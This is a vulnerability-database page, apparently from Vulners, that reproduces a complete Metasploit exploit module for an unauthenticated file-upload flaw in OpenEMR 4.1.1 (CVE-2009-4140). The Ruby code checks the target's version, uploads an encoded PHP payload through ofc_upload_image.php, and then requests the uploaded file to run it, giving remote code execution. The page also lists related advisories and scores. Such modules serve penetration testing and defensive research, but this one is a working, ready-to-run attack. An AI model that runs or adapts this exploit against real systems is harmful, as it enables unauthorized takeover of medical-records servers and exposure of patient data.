Lucene search
K

OpenEMR PHP File Upload Vulnerability

🗓️ 16 Feb 2013 12:11:46Reported by Gjoko Krstic <[email protected]>, juan vazquez <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 53 Views

OpenEMR PHP File Upload Vulnerability allows arbitrary file upload via ofc_upload_image.php in OpenEMR 4.1.

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Open Flash Chart 2 Arbitrary File Upload Vulnerability
26 Oct 201300:00
zdt
Circl
CVE-2009-4140
13 Feb 201300:00
circl
Check Point Advisories
Joomla ofc_upload_image.php Unrestricted File Upload (CVE-2009-4140)
24 Feb 201400:00
checkpoint_advisories
CVE
CVE-2009-4140
22 Dec 200922:00
cve
Cvelist
CVE-2009-4140
22 Dec 200922:00
cvelist
Debian CVE
CVE-2009-4140
22 Dec 200922:00
debiancve
Dsquare
ZonPHP 2.25 File Upload
1 Feb 201400:00
dsquare
Dsquare
OpenX 2.8.6 File Upload
1 May 201200:00
dsquare
Dsquare
Piwik 0.4.3 File Upload
1 May 201200:00
dsquare
NVD
CVE-2009-4140
22 Dec 200922:30
nvd
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "OpenEMR PHP File Upload Vulnerability",
      'Description'    => %q{
          This module exploits a vulnerability found in OpenEMR 4.1.1 By abusing the
        ofc_upload_image.php file from the openflashchart library, a malicious user can
        upload a file to the tmp-upload-images directory without any authentication, which
        results in arbitrary code execution. The module has been tested successfully on
        OpenEMR 4.1.1 over Ubuntu 10.04.
      },
      'License'        => MSF_LICENSE,
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [],
        'Reliability' => []
      },
      'Author'         =>
        [
          'Gjoko Krstic <gjoko[at]zeroscience.mk>', # Discovery, PoC
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2009-4140' ],
          [ 'OSVDB', '90222' ],
          [ 'BID', '37314' ],
          [ 'EDB', '24492' ],
          [ 'URL', 'http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5126.php' ],
          [ 'URL', 'http://www.open-emr.org/wiki/index.php/OpenEMR_Patches' ]
        ],
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['OpenEMR 4.1.1', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2013-02-13',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('TARGETURI', [true, 'The base path to EGallery', '/openemr'])
        ])
  end

  def check
    uri = target_uri.path
    peer = "#{rhost}:#{rport}"

    # Check version
    vprint_status("Trying to detect installed version")

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, "interface", "login", "login.php")
    })

    if res and res.code == 200 and res.body =~ /v(\d\.\d\.\d)/
      version = $1
    else
      return Exploit::CheckCode::Unknown
    end

    vprint_status("Version #{version} detected")

    if version > "4.1.1"
      return Exploit::CheckCode::Safe
    end

    # Check for vulnerable component
    vprint_status("Trying to detect the vulnerable component")

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php"),
    })

    if res and res.code == 200 and res.body =~ /Saving your image to/
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    uri = target_uri.path

    peer = "#{rhost}:#{rport}"
    payload_name = rand_text_alpha(rand(10) + 5) + '.php'
    my_payload = payload.encoded

    print_status("Sending PHP payload (#{payload_name})")
    res = send_request_raw({
      'method'  => 'POST',
      'uri'     => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php") + "?name=#{payload_name}",
      'headers' => { "Content-Length" => my_payload.length.to_s },
      'data'    => my_payload
    })

    # If the server returns 200 and the body contains our payload name,
    # we assume we uploaded the malicious file successfully
    if not res or res.code != 200 or res.body !~ /Saving your image to.*#{payload_name}$/
      fail_with(Failure::NotVulnerable, "#{peer} - File wasn't uploaded, aborting!")
    end

    register_file_for_cleanup(payload_name)

    print_status("Executing PHP payload (#{payload_name})")
    # Execute our payload
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri("#{uri}", "library", "openflashchart", "tmp-upload-images", payload_name),
    })

    # If we don't get a 200 when we request our malicious payload, we suspect
    # we don't have a shell, either.  Print the status code for debugging purposes.
    if res and res.code != 200
      print_error("Server returned #{res.code.to_s}")
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Apr 2023 09:27Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
EPSS0.75838
53